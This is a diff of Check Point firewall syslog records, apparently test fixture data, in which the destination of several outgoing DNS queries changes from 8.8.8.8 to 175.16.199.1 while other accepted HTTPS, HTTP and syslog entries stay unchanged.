-<134>1 2020-03-29T23:20:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d55,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524053"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:21:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d5f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524063"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:20:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d55,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524053"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:21:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d5f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524063"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:21:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d61,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:21:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d65,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52366"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:21:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d65,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52367"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:21:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d69,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524073"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53115"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:21:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d73,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524083"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53951"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:21:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d69,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524073"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53115"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:21:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d73,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524083"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53951"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52368"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52369"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52370"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52371"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:21:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:21:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:21:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:21:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:21:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d89,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d91,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524113"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33256"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d91,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524113"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33256"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41064"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45938"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10867"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59070"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48878"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10868"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45207"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61262"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10869"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:22:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d9b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524123"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40104"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:22:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d9b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524123"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40104"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
